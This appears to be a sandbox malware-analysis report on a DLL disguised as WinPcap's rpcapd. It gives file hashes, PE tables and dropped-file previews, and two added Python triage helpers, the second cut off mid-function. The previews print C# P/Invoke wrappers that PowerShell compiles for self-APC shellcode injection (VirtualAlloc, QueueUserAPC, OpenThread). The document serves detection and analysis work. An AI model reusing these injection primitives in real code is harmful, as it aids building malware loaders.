                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6501357671778076
                                      Encrypted:false
                                      SSDEEP:24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq
                                      MD5:0DB7703243576F0A4B5D43BDB20FD12B
                                      SHA1:67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF
                                      SHA-256:6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1
                                      SHA-512:0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):866
                                      Entropy (8bit):5.325866700512367
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj
                                      MD5:EE4CA1452DEB397DB57596D3E6012A15
                                      SHA1:E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA
                                      SHA-256:102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC
                                      SHA-512:EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.089404989746942
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX
                                      MD5:611F888895B72D1096C460FF7EA5E4B7
                                      SHA1:67CCD8B6129567C2A7CF8B601FD2709FA13D13D0
                                      SHA-256:FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F
                                      SHA-512:0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text
                                      Category:dropped
                                      Size (bytes):411
                                      Entropy (8bit):5.082169696837192
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                      MD5:248E15CD19191D4333303E0E1F8E9A70
                                      SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                      SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                      SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                      Category:dropped
                                      Size (bytes):369
                                      Entropy (8bit):5.22267238940763
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH
                                      MD5:7261F6CD6A6D4860AC034E27509DC55F
                                      SHA1:C1282BE561B76009A43FD5BC192CE9D76AF08272
                                      SHA-256:F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA
                                      SHA-512:CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813
                                      Malicious:false
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6369801237092227
                                      Encrypted:false
                                      SSDEEP:24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq
                                      MD5:21F3C262E8990FE0E1A44D58B448B899
                                      SHA1:2CD298766EC3E59F36C316B35BB0728368117153
                                      SHA-256:D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0
                                      SHA-512:2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):866
                                      Entropy (8bit):5.327904541660146
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj
                                      MD5:51149F7278FBC7AB67B11D6B7BF38CF0
                                      SHA1:15D9E224C099E0795568A20DAFACEEA4BF50D88A
                                      SHA-256:6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB
                                      SHA-512:DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
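The csc.exe command lines above have the shape PowerShell's Add-Type produces when it compiles inline C# (a random eight-character directory under Temp holding `<name>.0.cs` and `<name>.dll`, `/t:library`, a reference to System.Management.Automation.dll), and the two compiled wrappers together P/Invoke VirtualAlloc, SleepEx, GetCurrentProcess, QueueUserAPC, GetCurrentThreadId and OpenThread: enough to allocate a buffer, queue an APC pointing at it on the calling thread (OpenThread on GetCurrentThreadId) and fire it with an alertable SleepEx. The randomized parameter names are an obfuscation trait, not something the report scores. The Python below is an added triage helper, not code from the report or from the sample; the two C# sources are reconstructed from the dropped-file previews (each `.` in a preview is the UTF-8 BOM or a CR/LF) and the command line is the one shown above. The API sets, pattern names and score are this example's own choices.

```python
"""Triage of PowerShell Add-Type artifacts (P/Invoke wrappers compiled via csc.exe).

Added example, not part of the Joe Sandbox report. CS_WRAPPER_1/2 are reconstructed
from the report's dropped-file previews and CSC_CMDLINE is the csc.exe command line
the report shows. API sets, pattern names and the score are this example's choices.
"""
import re
from typing import Dict, List, Tuple

# Primitives that indicate shellcode staging or injection when P/Invoked from PowerShell.
INJECTION_APIS = {"VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "VirtualProtectEx",
                  "WriteProcessMemory", "CreateRemoteThread", "CreateThread", "QueueUserAPC",
                  "OpenThread", "OpenProcess", "SetThreadContext", "ResumeThread",
                  "NtQueueApcThread", "NtWriteVirtualMemory", "NtCreateThreadEx"}
# Helpers that usually accompany them: a handle to self and an alertable wait.
SUPPORT_APIS = {"GetCurrentProcess", "GetCurrentThread", "GetCurrentThreadId",
                "SleepEx", "Sleep", "CloseHandle"}

PINVOKE_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"[^\]]*\]\s*(?:public\s+|private\s+|internal\s+)?'
    r'static\s+extern\s+(?P<ret>[\w.<>\[\]]+)\s+(?P<name>\w+)\s*\(')
# Add-Type writes Temp\<rand8>\<rand8>.N.cs and compiles it to Temp\<rand8>\<rand8>.dll.
ADDTYPE_TEMP_RE = re.compile(r'\\Temp\\([a-z0-9]{8})\\\1\.(?:dll|\d+\.cs)$', re.I)
CSC_TOKEN_RE = re.compile(r'/[A-Za-z+-]+:"[^"]*"|"[^"]*"|\S+')

CS_WRAPPER_1 = """\ufeffusing System;
using System.Runtime.InteropServices;
namespace W32 { public class omrgvusmwh {
[DllImport("kernel32")]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32")]
public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);
} }
"""
CS_WRAPPER_2 = """\ufeffusing System;
using System.Runtime.InteropServices;
namespace W32 { public class yifpgxqqbj {
[DllImport("kernel32")]
public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
[DllImport("kernel32")]
public static extern IntPtr GetCurrentThreadId();
[DllImport("kernel32")]
public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
} }
"""
CSC_CMDLINE = (r'/t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL'
               r'\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" '
               r'/R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" '
               r'/debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"')


def extract_pinvokes(cs_source: str) -> List[Tuple[str, str]]:
    """(dll, function) for every [DllImport] declaration, in source order."""
    return [(m.group("dll").lower(), m.group("name")) for m in PINVOKE_RE.finditer(cs_source)]


def classify_pinvoke_surface(sources: List[str]) -> Dict[str, object]:
    """Union the P/Invoke surface of all Add-Type compiles from one PowerShell
    process and name the injection pattern that surface completes."""
    names = {name for src in sources for _, name in extract_pinvokes(src)}
    injection, support = sorted(names & INJECTION_APIS), sorted(names & SUPPORT_APIS)
    if {"VirtualAlloc", "QueueUserAPC"} <= names:
        # alloc in-process, OpenThread(GetCurrentThreadId()), QueueUserAPC, alertable SleepEx
        pattern = "self-APC shellcode execution"
    elif {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"} <= names:
        pattern = "remote thread injection"
    else:
        pattern = "injection primitives present" if injection else "none"
    return {"apis": sorted(names), "injection_apis": injection, "support_apis": support,
            "pattern": pattern, "score": 3 * len(injection) + len(support)}


def parse_csc_cmdline(cmdline: str) -> Dict[str, object]:
    """Target, output, references and sources of a csc.exe command line, plus
    whether it has the PowerShell Add-Type temp-compile shape."""
    out, target, refs, sources = "", "", [], []
    for tok in (t.strip('"') for t in CSC_TOKEN_RE.findall(cmdline)):
        if tok.startswith("/"):
            key, _, val = tok[1:].partition(":")
            key, val = key.lower(), val.strip('"')
            if key == "out":
                out = val
            elif key in ("t", "target"):
                target = val
            elif key in ("r", "reference"):
                refs.append(val)
        elif tok.lower().endswith(".cs"):
            sources.append(tok)
    # Add-Type compiles a library that references System.Management.Automation.dll
    # into a random Temp sub-directory (as in the report's command lines).
    sma = any(r.lower().endswith("system.management.automation.dll") for r in refs)
    temp = bool(ADDTYPE_TEMP_RE.search(out)) and bool(sources) and all(ADDTYPE_TEMP_RE.search(s) for s in sources)
    return {"target": target, "out": out, "references": refs, "sources": sources,
            "powershell_addtype": sma and target == "library" and temp}


if __name__ == "__main__":
    print(classify_pinvoke_surface([CS_WRAPPER_1, CS_WRAPPER_2]))
    print(parse_csc_cmdline(CSC_CMDLINE))
```

Feed it every `.cs` file that a single powershell.exe process dropped, not one at a time: here each wrapper alone only shows "injection primitives present", and the self-APC pattern appears only once the two are unioned, which is exactly why the attacker split them.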
                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.112861669562404
                                      TrID:
                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                      • DOS Executable Generic (2002/1) 0.20%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:VoevdOQpeU.dll
                                      File size:640699
                                      MD5:ba155d8aed7ca303fcfc3f0248d218e1
                                      SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
                                      SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
                                      SHA512:5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582
                                      SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB
                                      TLSH:12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED
                                      File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................
                                      Icon Hash:74f0e4ecccdce0e4
                                      Entrypoint:0x401023
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:fd1c62e6f93e304a27347077f6d2b44c
                                       Signature Valid:
                                       Signature Issuer:
                                       Signature Validation Error:
                                       Error Number:
                                           Certificate chain (Not Before / Not After, Subject Chain, Version, Thumbprint MD5 / SHA-1 / SHA-256, Serial): no certificate extracted
                                           Note: "Digitally signed: true" above reflects only a non-zero IMAGE_DIRECTORY_ENTRY_SECURITY entry. That entry has size 0x1 at 0x1000 (listed under .text below), which cannot hold a WIN_CERTIFICATE (its header alone is 8 bytes), so the file carries no verifiable Authenticode signature and the empty fields here are the expected result.
                                          Instruction
                                          jmp 00007F89EC4AA38Dh
                                          jmp 00007F89EC4DAAF8h
                                          jmp 00007F89EC4AA073h
                                          jmp 00007F89EC4A9D2Eh
                                          jmp 00007F89EC4AA149h
                                          jmp 00007F89EC4A9B84h
                                          jmp 00007F89EC4DFF6Fh
                                          jmp 00007F89EC4A9C8Ah
                                          jmp 00007F89EC4D32E5h
                                          jmp 00007F89EC4E31A0h
                                          jmp 00007F89EC4DEE0Bh
                                          jmp 00007F89EC4E4366h
                                          jmp 00007F89EC4A9C01h
                                          jmp 00007F89EC4D441Ch
                                          jmp 00007F89EC4E6A37h
                                          jmp 00007F89EC4DDCE2h
                                          jmp 00007F89EC4D549Dh
                                          jmp 00007F89EC4AA0B8h
                                          jmp 00007F89EC4E99D3h
                                          jmp 00007F89EC4A9DDEh
                                          jmp 00007F89EC4E5599h
                                          jmp 00007F89EC4DBBC4h
                                          jmp 00007F89EC4D64AFh
                                          jmp 00007F89EC4E53BAh
                                          jmp 00007F89EC4AA055h
                                          jmp 00007F89EC4E0F90h
                                          jmp 00007F89EC4D89EBh
                                          jmp 00007F89EC4E8AF6h
                                          jmp 00007F89EC4D78B1h
                                          jmp 00007F89EC4AA04Ch
                                          jmp 00007F89EC4A9BC7h
                                          jmp 00007F89EC4E20D2h
                                          jmp 00007F89EC4E7A4Dh
                                           int3 (repeated 34 times: filler after the jump thunks)
                                          Programming Language:
                                          • [ C ] VS2013 build 21005
                                          • [RES] VS2015 build 23026
                                          • [LNK] VS2013 UPD4 build 31101
                                          • [C++] VS2010 SP1 build 40219
                                          • [IMP] VS2012 UPD2 build 60315
                                          • [RES] VS2008 build 21022
                                          • [EXP] VS2015 UPD3.1 build 24215
                                          • [ C ] VS2012 UPD1 build 51106
                                          • [C++] VS2015 UPD3.1 build 24215
                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                           .rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                           .idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                           .rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                           Name | RVA | Size | Type | Language | Country
                                           RT_VERSION | 0x98170 | 0x3d0 | data | |
                                           DLL | Import
                                           WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                           msvcrt.dll | toupper
                                           USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                           OLEAUT32.dll | LHashValOfNameSysA
                                           SHELL32.dll | FindExecutableW
                                           KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                           Secur32.dll | InitializeSecurityContextW
                                           ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                                           GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW
                                           Note: the static import table contains no memory-allocation or process/thread-manipulation API (no VirtualAlloc*, WriteProcessMemory, CreateRemoteThread or QueueUserAPC); any such calls the sample makes are resolved at runtime, so the import hash above describes the loader stub, not its behaviour.
                                           Description | Data
                                           LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                           InternalName | rpcapd
                                           FileVersion | 4.0.0.1040
                                           CompanyName | CACE Technologies
                                           LegalTrademarks |
                                           ProductName | WinPcap
                                           ProductVersion | 4.0.0.1040
                                           FileDescription | Remote Packet Capture Daemon
                                           Build Description |
                                           OriginalFilename | rpcapd.exe
                                           Translation | 0x0000 0x04b0
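Several of the static fields above contradict each other: the SECURITY directory has size 0x1 while "Digitally signed" reads true and every signature field is empty; the link timestamp is August 2003 while the toolchain list names VS2013 and VS2015 builds; .rdata has entropy 7.16 over 0x41000 bytes (about 42% of the file); and the version resource is WinPcap's rpcapd.exe although the file is a DLL whose export directory is empty. The Python below is an added example, not the report's own logic, that encodes those checks over the report's fields so they can be re-run on any sample's static summary. SAMPLE is transcribed from the tables above; the check names, the 7.0 entropy threshold, the severities and the approximate Visual Studio release-year table are this example's own choices.

```python
"""Static PE triage over the fields a sandbox report exposes.

Added example, not part of the Joe Sandbox report. SAMPLE is transcribed from
the report's PE header, data directory, section, toolchain and version-info
tables for VoevdOQpeU.dll (directories no check needs are omitted). Check names,
thresholds and severities are this example's choices; VS_RELEASE_YEAR is an
approximate first-release year per Visual Studio toolchain.
"""
import re
from datetime import datetime, timezone
from typing import List, Tuple

Finding = Tuple[str, str, str]  # (check id, severity, detail)
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}
VS_RELEASE_YEAR = {2008: 2007, 2010: 2010, 2012: 2012, 2013: 2013,
                   2015: 2015, 2017: 2017, 2019: 2019, 2022: 2021}

SAMPLE = {
    "is_dll": True, "digitally_signed": True, "signature_valid": None,
    "timestamp": 0x3F4B4692, "imagebase": 0x400000, "entrypoint": 0x401023,
    "file_size": 640699,
    "directories": {"EXPORT": (0x0, 0x0), "SECURITY": (0x1000, 0x1)},
    # (name, virtual address, virtual size, raw size, entropy, characteristics)
    "sections": [
        (".text", 0x1000, 0x3f170, 0x40000, 4.447, "EXECUTE|CODE|READ"),
        (".rdata", 0x41000, 0x4001b, 0x41000, 7.157, "INITIALIZED_DATA|READ"),
        (".data", 0x82000, 0x14957, 0x12000, 5.402, "INITIALIZED_DATA|WRITE|READ"),
        (".idata", 0x97000, 0xadd, 0x1000, 2.649, "INITIALIZED_DATA|WRITE|READ"),
        (".rsrc", 0x98000, 0x703, 0x1000, 1.104, "INITIALIZED_DATA|READ"),
        (".reloc", 0x99000, 0x53a5, 0x6000, 5.134, "INITIALIZED_DATA|DISCARDABLE|READ"),
    ],
    "toolchain": ["[ C ] VS2013 build 21005", "[RES] VS2015 build 23026",
                  "[LNK] VS2013 UPD4 build 31101", "[C++] VS2010 SP1 build 40219",
                  "[IMP] VS2012 UPD2 build 60315", "[RES] VS2008 build 21022",
                  "[EXP] VS2015 UPD3.1 build 24215", "[ C ] VS2012 UPD1 build 51106",
                  "[C++] VS2015 UPD3.1 build 24215"],
    "version_info": {"OriginalFilename": "rpcapd.exe", "ProductName": "WinPcap",
                     "CompanyName": "CACE Technologies"},
}


def check_security_directory(pe) -> List[Finding]:
    """SECURITY is a file offset (not an RVA) to a WIN_CERTIFICATE blob: 8-byte
    header minimum, 8-byte aligned, inside the file."""
    off, size = pe["directories"].get("SECURITY", (0, 0))
    if (off, size) == (0, 0):
        return [("signed_flag_without_cert", "medium", "signed flag but empty SECURITY entry")] if pe["digitally_signed"] else []
    problems = [msg for cond, msg in (
        (size < 8, f"size 0x{size:x} is below the 8-byte WIN_CERTIFICATE header"),
        (off % 8 != 0, f"offset 0x{off:x} is not 8-byte aligned"),
        (off + size > pe["file_size"], "certificate table runs past end of file")) if cond]
    detail = "; ".join(problems) + "; a 'digitally signed' flag derived from this entry is meaningless"
    return [("security_dir_invalid", "high", detail)] if problems else []


def check_section_entropy(pe, threshold=7.0) -> List[Finding]:
    """Entropy near 8 bits/byte over a large section means packed or encrypted data."""
    return [("high_entropy_section", "high", f"{name} entropy {ent:.2f} over {raw / pe['file_size']:.0%} of the file")
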